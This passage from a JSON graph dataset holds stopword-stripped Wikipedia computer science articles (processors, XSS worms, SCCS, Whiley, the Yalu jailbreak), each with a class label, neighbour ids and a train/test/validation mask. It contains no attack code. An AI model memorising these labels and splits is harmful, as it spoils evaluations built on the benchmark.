pentium pro p6 microarchitecture august 8 2008 marked end intel netburst based processors reason netburst abandonment severe heat problems caused high clock speeds core- nehalem-based processors higher tdps processors multi-core core gives fraction maximum tdp highest-clocked core-based single-core processors give maximum 27 w heat fastest-clocked desktop pentium 4 processors single-core tdps 115 w compared 88 w fastest clocked mobile versions although introduction new steppings tdps models eventually lowered nehalem microarchitecture successor core microarchitecture actually supposed evolution netburst according intel roadmaps dating back 2000 due netburst abandonment nehalem completely different project similarities netburst nehalem reimplements hyper-threading technology first introduced 3.06 ghz northwood core pentium 4 nehalem also implements l3 cache processors based consumer processor implementation l3 cache first used gallatin core pentium 4 extreme edition oddly missing prescott 2m core brand",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      6926,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      3992,
      3995,
      5883,
      6175,
      8231,
      10669,
      9391,
      7218,
      10675,
      4276,
      1461,
      8501,
      10548,
      2237,
      5309,
      8125,
      8126,
      7105,
      6339,
      5444,
      9541,
      7110,
      8523,
      1998,
      2638,
      977,
      5073,
      5329,
      5844,
      7002,
      10205,
      7134,
      1119,
      3175,
      1000,
      7657,
      9707,
      4204,
      1005,
      5356,
      5871,
      1776,
      4465,
      8684,
      499,
      8820,
      3317,
      630,
      10734,
      4217,
      4603,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 7658,
    "label": 8,
    "text": "Smarty_(template_engine):smarty template engine smarty web template system written php smarty primarily promoted tool separation concerns smarty intended simplify compartmentalization allowing front-end web page change separately back-end ideally lowers costs minimizes efforts associated software maintenance smarty generates web content placement special smarty tags within document tags processed substituted code tags directives smarty enclosed template delimiters directives variables denoted dollar sign functions logical loop statements smarty allows php programmers define custom functions accessed using smarty tags since smarty separates php html two files — one contains presentation code html template including smarty variables tags might look like business logic use smarty template could follows",
    "neighbors": [
      963,
      8644,
      7785,
      6154,
      4171,
      9738,
      7373,
      8846,
      3224
    ],
    "mask": "None"
  },
  {
    "node_id": 7659,
    "label": 4,
    "text": "XSS_worm:xss worm xss worm sometimes referred cross site scripting virus malicious sometimes non-malicious payload usually written javascript breaches browser security propagate among visitors website attempt progressively infect visitors first mentioned 2002 relation cross site scripting vulnerability hotmail xss worms exploit security vulnerability known cross site scripting xss short within website infecting users variety ways depending vulnerability site features profiles chat systems affected xss worms implemented improperly without regard security often worms specific single web site spreading quickly exploiting specific vulnerabilities cross-site scripting vulnerabilities commonly exploited form worms popular social commercial websites myspace yahoo orkut justin.tv facebook twitter worms used malicious intent giving attacker basis steal personal information provided web site passwords credit card numbers several xss worms affected popular web sites samy worm largest known xss worm infected 1 million myspace profiles less 20 hours virus author sued entered plea agreement felony charge justin.tv video casting website active user base approximately 20 thousand users cross-site scripting vulnerability exploited location profile field properly sanitized inclusion profile page location profile field sanitized included title profile page within actual field page body meant authors worm order achieve stealth boost lifetime spread worm automatically remove xss payload title page within worm code already hidden comments proper development worm executed approximately saturday 28 jun 2008 21:52:33 utc finished sun 29 jun 2008 21:12:21 utc since social website targeted particularly active compared popular xss worm targets worm infected total 2525 profiles within roughly 24 hours worm found hours successfully removed based data recorded due worm original intent research purposes worm able infect uninfected profiles sanitized forcefully developers justin.tv worm sanitized vulnerability patched able removed easily however shows ability worm adapt spread even counter-attack particular factors indicated graphs data released attackers include social activity lack new uninfected users periods time orkut social networking site also hit xss worm infected users receive scrap containing words bom sabado portuguese happy saturday google yet comment situation",
    "neighbors": [
      225,
      3941,
      3462,
      4198,
      7739,
      8045,
      2041,
      3643,
      8735
    ],
    "mask": "None"
  },
  {
    "node_id": 7660,
    "label": 7,
    "text": "Lunacloud:lunacloud lunacloud cloud computing infrastructure service provider based lisbon lunacloud founded 2011 antónio miguel ferreira charles nasser launched services general public provides cloud computing infrastructure service cloud servers cloud storage cloud jelastic hosting performance cost lunacloud offerings favourably rated techweekeurope techrepublic cloudspectator compared rackspace amazon ec2 lunacloud three base products — cloud servers cloud storage cloud jelastic lunacloud helps design build operate workloads across environments depending individual needs customer cloud servers provides scalable virtual servers using parallels vmware clouds servers deployed using control panel api api also compatible amazon s3 api cloud jelastic acronym java elastic unlimited paas container based iaas within single platform provides high availability applications automatic vertical horizontal scaling via containerization software development clients enterprise businesses devops system admins developers lunacloud headquarters lisbon lunacloud localized storefronts differ selection prices differentiated top-level domain country code",
    "neighbors": [
      6018,
      1539,
      8451,
      6153,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      11097,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      8044,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 7661,
    "label": 3,
    "text": "Ganbare_Goemon!_Karakuri_Dōchū:ganbare goemon karakuri dōchū game revolves around main character goemon exploits name suggests character based ishikawa goemon noble thief japanese folklore unlike sequels game still n't feature comic situation strange characters define series goemon portrayed noble thief rather plain hero game plays top view action/adventure game similar legend zelda though separated stages level goemon must find three passes order advance passes found boxes secret passages bought finishing stages game present new japanese province eight total levels remain ending however different like rest series goemon powered certain items found and/or bought lost hits msx version option played turns two players second player playing ninja named nezumi kozō basis goemon sidekick ebisumaru addition unlike family computer version game six provinces completely new levels finishing game",
    "neighbors": [
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 7662,
    "label": 9,
    "text": "Convolution_(computer_science):convolution computer science computer science specifically formal languages convolution sometimes referred zip function maps tuple sequences sequence tuples name zip derives action zipper interleaves two formerly disjoint sequences reverse function unzip performs deconvolution given three words cat fish cat 3 fish 4 2 let formula_1 denote length longest word fish formula_2 convolution cat fish 4 tuples elements symbol original alphabet haskell truncates shortest sequence formula_4 formula_5 let σ alphabet symbol σ let x x ... x ... z z ... z ... n words i.e finite sequences elements σ let formula_1 denote length longest word i.e maximum x z ... convolution words finite sequence n -tuples elements σ ∪ i.e element formula_7 index w w convolution x z ... denoted conv x z ... zip x z ... x ⋆ ⋆ z ⋆ ... inverse convolution sometimes denoted unzip variation convolution operation defined formula_4 minimum length input words avoids use adjoined element formula_11 destroys information elements input sequences beyond formula_4 convolution functions often available programming languages often referred zip lisp-dialects one simply map desired function desired lists map variadic lisp take arbitrary number lists argument example clojure common lisp languages python provide zip function older version python 2 allowed mapping none lists get similar effect zip conjunction operator unzips list haskell method convolving sequences requires specific function arity zip two sequences zip3 three etc similarly functions unzip unzip3 available unzipping list languages support convolution",
    "neighbors": [
      3876,
      6502,
      5031,
      8262,
      8554,
      5165,
      2062,
      9245,
      5917
    ],
    "mask": "Test"
  },
  {
    "node_id": 7663,
    "label": 6,
    "text": "Extended_file_attributes:extended file attributes extended file attributes file system features enable users associate computer files metadata interpreted filesystem whereas regular attributes purpose strictly defined filesystem permissions records creation modification times unlike forks usually large maximum file size extended attributes usually limited size value significantly smaller maximum file size typical uses include storing author document character encoding plain-text document checksum cryptographic hash digital certificate discretionary access control information aix jfs2 v2 filesystem supports extended attributes accessible using getea command getea setea listea statea removeea apis support fetching setting listing getting information removing extended attributes support extended file attributes removed openbsd source code 2005 due lack interest access control lists freebsd 5.0 later ufs1 ufs2 zfs filesystems support extended attributes using extattr_ family system calls regular file may list extended attributes attribute consists name associated data name must null-terminated string exists namespace identified small-integer namespace identifier currently two namespaces exist user system user namespace restrictions regard naming contents system namespace primarily used kernel access control lists mandatory access control linux ext2 ext3 ext4 jfs squashfs yaffs2 reiserfs reiser4 xfs btrfs orangefs lustre ocfs2 1.6 zfs f2fs filesystems support extended attributes abbreviated xattr enabled kernel configuration regular file directory may extended attributes consisting name associated data name must null-terminated string prefixed namespace identifier dot character currently four namespaces exist user trusted security system user namespace restrictions regard naming contents system namespace primarily used kernel access control lists security namespace used selinux example support extended attribute concept posix.1e draft withdrawn 1997 added linux around 2002 2016 yet widespread use user-space linux programs used beagle openstack swift dropbox kde semantic metadata framework baloo chromium wget curl set recommendations using available freedesktop.org linux kernel allows extended attribute names 255 bytes values 64kib xfs reiserfs ext2/3/4 btrfs impose much smaller limits requiring attributes names values one file fit one filesystem block usually 4 kib extended attributes accessed modified using codice_1 codice_2 codice_3 commands codice_1 package distributions mac os x 10.4 later support extended attributes making use hfs+ filesystem attributes file b*-tree feature allows named forks although named forks hfs+ support arbitrarily large amounts data extents os support extended attributes supports inline attributes limiting size fit within single b*-tree node regular file may list extended attributes hfs+ supports arbitrary number named forks unknown macos imposes limit number extended attributes attribute consists name associated data name null-terminated unicode string macos apis support listing getting setting removing extended attributes files directories command line abilities exposed xattr utility recent versions macos files originating web marked codice_5 via extended file attributes older versions macos mac os x 10.6 user space extended attributes preserved save common cocoa applications textedit preview etc. os/2 version 1.2 later high performance file system designed extended attributes mind support also retro-fitted fat filesystem dos compatibility operating systems using fat partition os/2 attributes stored inside single file ea data sf located root directory file normally inaccessible operating system supporting extended attributes manages disk freely manipulated example dos files directories extended attributes use one clusters inside file logical cluster number first used cluster stored inside owning file directory directory entry two bytes used purposes fat32 filesystem hence os/2 extended attributes stored filesystem parts os/2 version 2.0 later workplace shell uses several standardized extended attributes also called eas purposes like identifying filetype comments computer icons keywords file programs written interpreted language rexx store already parsed version code extended attribute allow faster execution solaris version 9 later allows files extended attributes actually forks maximum size extended attribute maximum size file read written fashion files internally actually stored accessed like normal files names contain characters ownership permissions differ parent file version 4 network file system supports extended attributes much way solaris windows nt limited-length extended attributes supported fat hpfs ntfs implemented part os/2 subsystem notably used nfs server interix posix subsystem order implement unix-like permissions windows subsystem linux added windows 10 anniversary update uses similar purposes storing linux file mode owner device id applicable file times extended attributes additionally ntfs store arbitrary-length extended attributes form alternate data streams ads type resource fork plugins file manager total commander like ntfs descriptions quicksearch extended support filtering file list searching metadata contained ads streams",
    "neighbors": [
      5120,
      6669,
      3598,
      4623,
      10257,
      6677,
      5142,
      8214,
      10785,
      9762,
      5158,
      52,
      11323,
      8772,
      4708,
      9836,
      7789,
      8303,
      9839,
      9840,
      9842,
      9333,
      6263,
      9335,
      639,
      9343,
      5256,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6813,
      3744,
      6309,
      1190,
      5286,
      10405,
      1193,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3280,
      3795,
      4819,
      8404,
      6358,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      9455,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      3330,
      11012,
      2314,
      8461,
      6416,
      8976,
      6935,
      11033,
      8988,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      10033,
      1844,
      10036,
      823,
      9533,
      3909,
      2378,
      4431,
      5969,
      10580,
      5975,
      346,
      2395,
      2397,
      10596,
      7540,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      5514,
      8075,
      4506,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8110,
      8114,
      7603,
      1464,
      1978,
      8129,
      3522,
      8643,
      7126,
      1509,
      9189,
      10221,
      6126,
      3571,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 7664,
    "label": 7,
    "text": "Symphony_(software):symphony software ibm spectrum symphony previously known ibm platform symphony platform symphony high-performance computing hpc software system developed platform computing company developed load sharing facility lsf focusing financial services symphony designed deliver scalability enhances performance compute-intensive risk analytical applications product lets users run applications using distributed computing version 4.0 platform included developer edition restrictions time limits symphony developer edition free high-performance computing hpc grid computing software development kit middleware described first solution tailored developing testing grid-ready service-oriented architecture applications",
    "neighbors": [
      5956,
      4107,
      5677,
      6797,
      7983,
      3573,
      823,
      8122
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7665,
    "label": 3,
    "text": "TIM-001:tim-001 tim-001 application development microcomputer developed mihajlo pupin institute serbia 1983/84 1 dragoljub milićević dušan hristović ed računari tim naučna knjiga belgrade 1990 serbian language 2 dušan hristović razvoj računarstva u srbiji computing serbia phlogiston journal 18/19 pp.89-105 museum mnt-sanu belgrade 2010/2011 serbian 3 d.b.vujaklija n.markovic ed 50 years computing serbia pp.37-44 dis imp pc-press belgrade 2011",
    "neighbors": [
      6859,
      10356,
      9606,
      10635
    ],
    "mask": "Test"
  },
  {
    "node_id": 7666,
    "label": 6,
    "text": "Source_Code_Control_System:source code control system source code control system sccs version control system designed track changes source code text files development piece software allows user retrieve previous versions original source code changes stored originally developed bell labs 1972 marc rochkind ibm system/370 computer running os/360 sccs also known codice_1 string example string contains file name date also contain comment compilation string found binary object files looking pattern used determine source code files used compilation command available automate search version strings 1972 marc rochkind developed sccs snobol4 bell labs ibm system/370 computer running os/360 mvt later rewritten c unix running pdp-11 first publicly released version sccs version 4 february 18 1977 available programmer workbench pwb edition operating system release 4 sccs first version used text-based history file format earlier versions use binary history file formats release 4 longer written maintained marc rochkind subsequently sccs included commercial system iii system v distributions licensed 32v ancestor bsd sccs command set part single unix specification sccs dominant version control system unix later version control systems notably rcs later cvs gained widespread adoption today early version control systems generally considered obsolete particularly open-source community largely embraced distributed version control systems however sccs file format still used internally newer version control programs including bitkeeper teamware latter frontend sccs sablime developed modified version sccs uses history file format incompatible sccs sccs file format uses storage technique called interleaved deltas weave storage technique considered many version control system developers foundational advanced merging versioning techniques precise codeville pcdv merge apart fixing year 2000 problems 1999 active development various unix vendor specific sccs versions 2006 sun microsystems today part oracle released solaris version sccs open-source cddl license part efforts open-source solaris source code control system sccs system controlling file history changes software typically upgraded new version fixing bugs optimizing algorithms adding extra functions changing software causes problems require version control solve sccs built solve problems sccs five major versions ibm os five major versions unix two specific implementations using sccs pdp 11 unix ibm 370 os sccs consists two parts sccs commands sccs files basic operations e.g. create delete edit realized sccs commands sccs files unique format prefix codice_2 controlled sccs commands sccs file composed three different parts sccs delta refers change sccs file deltas stored delta table sccs file record changes every operation sccs file tracked flags functions three types control records used keep track insertions deletions applied different deltas insertion control record deletion control record end control record whenever user changes part text control record inserted surrounding change control records stored body along original source code text records lots commands used sccs commands helps users finish want achieve without understanding worked also sccs allows users access history files moreover also provides commands allow edit monitor change source files sccs create command uses text source file create new history file example outputs name version lines create command macro expands admin create new history file followed get retrieve file edit specific file edit command macro expands get -e. check new version get new version sccs delget command macro expands delta check new version file followed get retrieve file outputs version lines want get specific file command produces report changes made unix versions include version sccs however often longer actively developed jörg schilling requested release sccs early days opensolaris project maintains fork sccs based opensolaris source code received major feature enhancements remains compatible original sccs versions unless using new project mode heirloom project includes version sccs derived opensolaris source code maintained december 2006 april 2007 gnu offers sccs compatible program gnu cssc compatibly stupid source control occasionally used convert sccs archives newer systems like cvs subversion complete sccs implementation recommended use new projects mostly meant converting modern version control system since 1990s many new version control systems developed become popular designed managing projects large number files offer advanced functionality multi-user operation access control automatic building network support release management distributed version control bitkeeper teamware use sccs file format internally considered successors sccs src version control system also use sccs file format internally rcs aims provide better user interface sccs still managing single-file projects",
    "neighbors": [
      9665,
      11363,
      1668,
      7460,
      5992,
      10569,
      2222,
      7983,
      2035,
      2132,
      2995,
      5397,
      4919,
      9724,
      2045,
      9151
    ],
    "mask": "Train"
  },
  {
    "node_id": 7667,
    "label": 6,
    "text": "Pack_(compression):pack compression pack deprecated unix shell compression program based huffman coding unpack utility restore files original state compressed using pack utility files specified standard input uncompressed standard output although obsolete support packed files exists modern compression tools gzip 7-zip files compressed pack typically given extension .z confused .z compress files returned original state using unpack addition may also pcat command reads compressed file sends output stdout",
    "neighbors": [
      6022,
      10121,
      1420,
      1940,
      3222,
      9880,
      3114,
      10027,
      11442,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      8414,
      1631,
      3296,
      9953,
      5858,
      11614,
      6759,
      7529,
      4459,
      237,
      1646,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 7668,
    "label": 4,
    "text": "Humming_Heads:humming heads humming heads inc. eip enterprise information protection software developer based japan humming heads inc. founded 1999 focus computer security shipped first product security platform sep 2001 anti-virus software taking sox seriously humming heads introduced functionality preventing unauthorized access confidential information theft electronic systems humming heads came implementation desktop file manager 2017 firm entered us market sep prevents unauthorized information access pc well external devices sep client controlling storage devices automatically performs operations like encryption also keeps log user operations stored server side analyzed needed one important features sep marginal effect client pc performance originally sep available japanese language chinese english versions sep software development",
    "neighbors": [
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7669,
    "label": 8,
    "text": "Mobile_web_analytics:mobile web analytics mobile web analytics studies behavior mobile website visitors similar way traditional web analytics commercial context mobile web analytics refers use data collected visitors access website mobile phone helps determine aspects website work best mobile traffic mobile marketing campaigns work best business including mobile advertising mobile search marketing text campaigns desktop promotion mobile sites services data collected part mobile analytics typically includes page views visits visitors countries well information specific mobile devices device model manufacturer screen resolution device capabilities service provider preferred user language data typically compared key performance indicators performance return investment used improve website mobile marketing campaign audience response majority modern smartphones able browse websites browsing experiences similar desktop computers w3c mobile web initiative identifies best practices help websites support mobile phone browsing many companies use guidelines mobile-specific code like wireless markup language html5 optimize websites viewing mobile devices begin way users interact cell phone tablet differs immensely way interact desktop laptop action clicking mouse replaced action swiping finger scrolling longer pages relevant information one place replaced top heavy navigation styles factors greatly influence click-through rates consequently way web analytics used collecting mobile web analytics data proven less straightforward traditional web analytics due defining factors traditional analytics software mobile website provides data http requests coming advanced mobile browsers found iphone smart phones pdas data mobile devices browsing site common web analytics software use server log parsing associate different ip addresses unique visits may fail actually identify unique visitors due ip addresses mobile device originating gateway ip address network access provider several dynamic server-side platforms used develop mobile sites server-side tracking code recommended accurate analytics reporting different tracking processes mechanisms available platforms unsupported/html sites javascript pixel tracking mechanism commonly used mobile websites typically open access kind network fixed wi-fi cellular wireless satellite wireless etc traditional web analytics solution could range fairly accurate mostly inaccurate depending http requests coming addition mobile web analytics involve metrics kpis associated mobile device information model manufacturer screen resolution data usually assembled combining device identification information taken special http headers user-agents device capabilities stored device information registry wurfl method provided traditional web analytics solutions mobile web-specific visitor identification important aspect usable mobile web analytics one hardest technical aspects accomplish primarily javascript http cookies unreliable mobile browsers result mobile web analytics solutions detect count user visits per day best solutions provide reliable persistent unique user identities allowing accurate measurement repeat visits long-term customer loyalty javascript-based page tagging notifies third-party server page rendered web browser method assumes end user browser javascript capabilities javascript enabled though possible neither may true time mobile web browsers support javascript sufficiently work http cookies commonly used mark identify visitors cookies standard capability desktop web browsers prevalence iphones androids http cookies supported smartphones default iphones android phones accept browser cookies web sites desktop browsers mobile device user may choose disable cookies http referrer information showing visitor navigated generally provided mobile web browsing either device manufacturer disabled sending information http request save bandwidth network usage mobile network operator internet gateway removes alters original http header due gateway software use mobile web transcoding software handset caching mechanisms impact use images page tagging cases image caching handsets performed regardless anti-caching headers output remote server desktop web browsing network address client machine usually gives form user identification location mobile web browsing client ip address refers internet gateway machine owned network operator devices blackberry phones using opera mini browser software ip address refers operator-owned internet gateway machine canada norway collection mobile web analytics data requires different approach collecting traditional web analytics data number solutions available best results obtained use one technology also known tagless data capture passive network capture technique uses tap mobile users web server capture full content client-server exchange tagless data capture techniques increasing popularity mobile web analytics capture users work devices require javascript cookies server logs plugins images forced work mobile web analytics provided transmitted image always unique level information recorded transmissions depends architecture provided supplier image beacon solutions link redirection important method tracking mobile visitor activities reliable way record clicks advertising search marketing activities also records visitors clicking links leave site method helps address lack http referrer information mobile tells number basic facts mobile phone browser used conjunction device database wurfl operator database used identify operators countries based ip addresses internet gateway devices ip addresses alone identify operators countries operators share mobile networks virtual network operators mvno boost wireless example uses sprint network two operators different customer demographics clear differentiation operators critical good mobile marketing campaigns carriers may also share mobile internet gateways sometimes across multiple countries many change add gateways regular basis wap gateway logs mine information analysed get relevant information mobile traffic goes servers companies like openwave tools analyse logs provide information required",
    "neighbors": [
      2208,
      5536,
      8644,
      9732,
      3462,
      6,
      8554,
      6576,
      3573,
      5048,
      1083,
      7965,
      8639
    ],
    "mask": "Test"
  },
  {
    "node_id": 7670,
    "label": 9,
    "text": "S-1_Lisp:s-1 lisp s-1 lisp lisp implementation written lisp 36-bit pipelined s-1 mark iia supercomputer computer architecture 32 megawords ram",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      1480,
      7880,
      8523,
      8908,
      1613,
      205,
      9932,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 7671,
    "label": 9,
    "text": "Whiley_(programming_language):whiley programming language whiley experimental programming language combines features functional imperative paradigms supports formal specification function preconditions postconditions loop invariants language uses flow-sensitive typing also known flow typing whiley project began 2009 response verifying compiler grand challenge put forward tony hoare 2003 first public release whiley june 2010 primarily developed david pearce whiley open source project contributions small community system used student research projects teaching undergraduate classes supported 2012 2014 royal society new zealand marsden fund whiley compiler generates code java virtual machine inter-operate java jvm based languages goal whiley provide realistic programming language verification used routinely without thought idea tool long history strongly promoted early 2000s hoare verifying compiler grand challenge purpose challenge spur new efforts develop verifying compiler roughly described follows primary purpose tool improve software quality ensuring program meets formal specification whiley follows many attempts develop tools including notable efforts spark/ada esc/java spec dafny why3 frama-c previous attempts develop verifying compiler focused extending existing programming languages constructs writing specifications example esc/java java modeling language add annotations specifying preconditions postconditions java likewise spec frama-c add similar constructs c c programming languages however languages known contain numerous features pose difficult insurmountable problems verification contrast whiley language designed scratch effort avoid common pitfalls make verification tractable syntax whiley follows general appearance imperative object-oriented languages indentation syntax chosen use braces delineate statement blocks given strong resemblance python however imperative look whiley somewhat misleading language core functional pure whiley distinguishes codice_1 pure codice_2 may side-effects distinction necessary allows functions used specifications familiar set primitive data types available including codice_3 codice_4 arrays e.g codice_5 records e.g codice_6 however unlike programming languages integer data type codice_4 unbounded correspond fixed-width representation 32-bit two complement thus unconstrained integer whiley take possible integer value subject memory constraints host environment choice simplifies verification reasoning modulo arithmetic known hard problem compound objects e.g arrays records references values heap languages java c instead immutable values whiley takes unusual approach type checking referred flow typing variables different static types different points function method flow typing similar occurrence typing found racket aid flow typing whiley supports union intersection negation types union types comparable sum types found functional languages like haskell whiley disjoint intersection negation types used context flow typing determine type variable true false branches runtime type test example suppose variable codice_8 type codice_9 runtime type test codice_10 true branch type codice_8 becomes codice_12 whilst false branch becomes codice_13 whiley uses structural rather nominal type system modula-3 go ceylon examples languages support structural typing form whiley supports reference lifetimes similar found rust lifetimes given allocating new objects indicate safely deallocated references objects must include lifetime identifier prevent dangling references every method implicit lifetime referred codice_14 variable type codice_15 represents reference object type codice_9 deallocated enclosing method subtyping lifetimes determined outlives relation thus codice_17 subtype codice_18 lifetime codice_19 statically outlives lifetime codice_20 lifetime whose scope encloses another said outlive lifetimes whiley differ rust currently include concept ownership whiley built-in support concurrency formal memory model determine reading/writing shared mutable state interpreted following example illustrates many interesting features whiley including use postconditions loop invariants type invariants union types flow typing function intended return first index integer codice_21 array integer codice_22 index exists codice_23 returned // define type natural numbers type nat int x x 0 public function indexof int items int item int|null index // int returned element position matches item ensures index int == items index == item // int returned element position first match // null returned element items matches item ensures index null == 0 .. |items| items == item function declared return type given union type codice_24 indicates either codice_4 value returned codice_23 returned function postcondition made three codice_27 clauses describe different properties must hold returned codice_28 flow typing employed clauses runtime type test operator codice_29 example first codice_27 clause variable codice_28 retyped codice_24 codice_4 right-hand side implication operator i.e codice_34 example also illustrates use inductive loop invariant loop invariant must shown hold entry loop given iteration loop loop exits case loop invariant states known elements codice_22 examined far — namely none matches given codice_21 loop invariant affect meaning program sense might considered unnecessary however loop invariant required help automated verifier using whiley compiler prove function meets specification example also defines type codice_37 appropriate type invariant type used declare variable codice_38 indicate never hold negative value case declaration prevents need additional loop invariant form codice_39 would otherwise necessary whiley began 2009 first public release codice_40 following june 2010 codice_41 september year language evolved slowly numerous syntactical changes made to-date versions prior codice_42 supported first-class codice_43 codice_44 data types removed favour representing strings constrained codice_5 arrays likewise versions prior codice_46 supported first-class set e.g codice_47 dictionary e.g codice_48 resizeable list codice_49 dropped favour simple arrays e.g codice_5 perhaps controversial removal codice_51 datatype version codice_52 many changes motivated desire simplify language make compiler development manageable another important milestone evolution whiley came version codice_53 inclusion reference lifetimes developed sebastian schweizer part master thesis university kaiserslautern",
    "neighbors": [
      9345,
      1954,
      3876,
      8251,
      2666,
      2283,
      8554,
      5677,
      10571,
      5872,
      7889,
      4341,
      10649,
      2618,
      1435,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7672,
    "label": 6,
    "text": "SuperCopier:supercopier supercopier file-copying software windows macos linux superseded ultracopier noted supercopier official website main features include normal vs ultimate version",
    "neighbors": [
      2406,
      8524,
      7983,
      10101,
      823,
      10489
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7673,
    "label": 8,
    "text": "URL_normalization:url normalization url normalization process urls modified standardized consistent manner goal normalization process transform url normalized url possible determine two syntactically different urls may equivalent search engines employ url normalization order reduce indexing duplicate pages web crawlers perform url normalization order avoid crawling resource web browsers may perform normalization determine link visited determine page cached several types normalization may performed always semantics preserving may following normalizations described rfc 3986 result equivalent urls http https urls following normalizations listed rfc 3986 may result equivalent urls guaranteed standards applying following normalizations result semantically different url although may refer resource normalization rules may developed specific websites examining url lists obtained previous crawls web server logs example url appears crawl log several times along may assume two urls equivalent normalized one url forms schonfeld et al 2006 present heuristic called dustbuster detecting dust different urls similar text rules applied url lists showed correct dust rules found applied normalization algorithm able find 68 redundant urls url list",
    "neighbors": [
      2016,
      2945,
      1802,
      113,
      6002,
      6993,
      5012,
      10579,
      119,
      1723
    ],
    "mask": "Test"
  },
  {
    "node_id": 7674,
    "label": 1,
    "text": "TRICS:trics trics trip rate information computer system database trip rates developments used united kingdom transport planning purposes specifically quantify trip generation new developments trics consortium describes trics follows database established 1989 six county councils south east england county councils dorset east sussex hampshire kent surrey west sussex run trics consortium limited trics 7 major update released late 2013 trics includes following development categories trics also developed sam standard assessment methodology system measure effectiveness travel plans",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 7675,
    "label": 2,
    "text": "Mtrace:mtrace codice_1 memory debugger included gnu c library note codice_1 tool works single threaded applications one thread could temporarily remove hook another thread could malloc memory sametime leading missed allocations multithreaded application function codice_1 installs handlers codice_4 codice_5 codice_6 function codice_7 disables handlers prototypes defined header file codice_8 handlers log memory allocations frees file defined environment variable malloc_trace variable unset describes invalid filename describes filename user permissions handlers installed perl script called codice_1 confused function name also distributed gnu c library script parses output file reports allocations freed following example bad source code problem program allocates memory ’ free memory exiting mtrace command reports “ memory leaks ” memory allocated last execution program also released way hand mtrace gives output means programmer still work following example good source code releases memory allocated uses mtrace notify programmer memory leaks",
    "neighbors": [
      8582,
      2045,
      814,
      7847
    ],
    "mask": "Test"
  },
  {
    "node_id": 7676,
    "label": 0,
    "text": "Eduard_Hovy:eduard hovy eduard hovy research professor language technologies institute carnegie mellon university one original 17 fellows association computational linguistics eduard hovy received m.s december 1982 ph.d. may 1987 degrees computer science yale university awarded honorary doctorates national university distance education uned madrid 2013 university antwerp 2015",
    "neighbors": [
      7724
    ],
    "mask": "None"
  },
  {
    "node_id": 7677,
    "label": 7,
    "text": "Halogen_Software:halogen software halogen software canadian company provides cloud-based talent management solutions customers 100 10,000 employees firm founded 1996 headquartered ottawa ontario canada firm formerly known manta corporation june 2001 changed name halogen software inc. halogen software backed jmi equity since 2008 les rechan became halogen software ’ new president ceo 2015 serving interim ceo halogen ’ board directors may 2015 halogen opened office united kingdom september 2011 created first australian office 2012 2013 2015 opened new offices san jose north carolina amsterdam dubai may 2013 halogen software debuted toronto stock exchange ticker symbol hgn company stock jumped 17 percent first day september 2013 halogen software launched two software modules implement one-on-one sessions managers employees workforce improve employee communication incorporating myers–briggs type indicator may 2017 halogen software acquired saba software 293 million",
    "neighbors": [
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 7678,
    "label": 4,
    "text": "Yalu_(iOS):yalu ios yalu formerly yalu mach portal jailbreaking tool created qwertyoruiop luca todesco marcograssi supports ios 10.1 10.1.1 ios 10.2 64-bit devices pre-iphone 7 ios 10.1 10.1.1 iphone 7 jailbreak semi-untethered requires rerun upon reboot however app certificate expires seven days sideloaded using cydia impactor jailbreak uses vulnerabilities released google project zero mach_portal intended developers final release mach_portal beta 4.1 developer reported broken initially saurik mobile substrate working later versions mach_portal attempted fix remained unstable developers launch app sideloaded using cydia impactor wait crash activate mach_portal supported iphone 7 iphone 6s ipad pro yalu successor mach_portal uses vulnerabilities patched ios 10.2.1 released 64-bit devices pre-iphone 7 beta 1 verifies mobile substrate works beta 2 added support iphone 5s/se 6 present mach_portal beta 3 fixes glitch users apple watch would experience beta 4 patches kernel forces dropbear use secure port instead 0.0.0.0 underneath beta 5 yalu download page qwertyoruiop writes placebo effect minor bug fixes patched release beta 7 adds support ios 10 64-bit devices jailbreakers reported final release stable",
    "neighbors": [
      5000,
      6474,
      4957,
      1623
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7679,
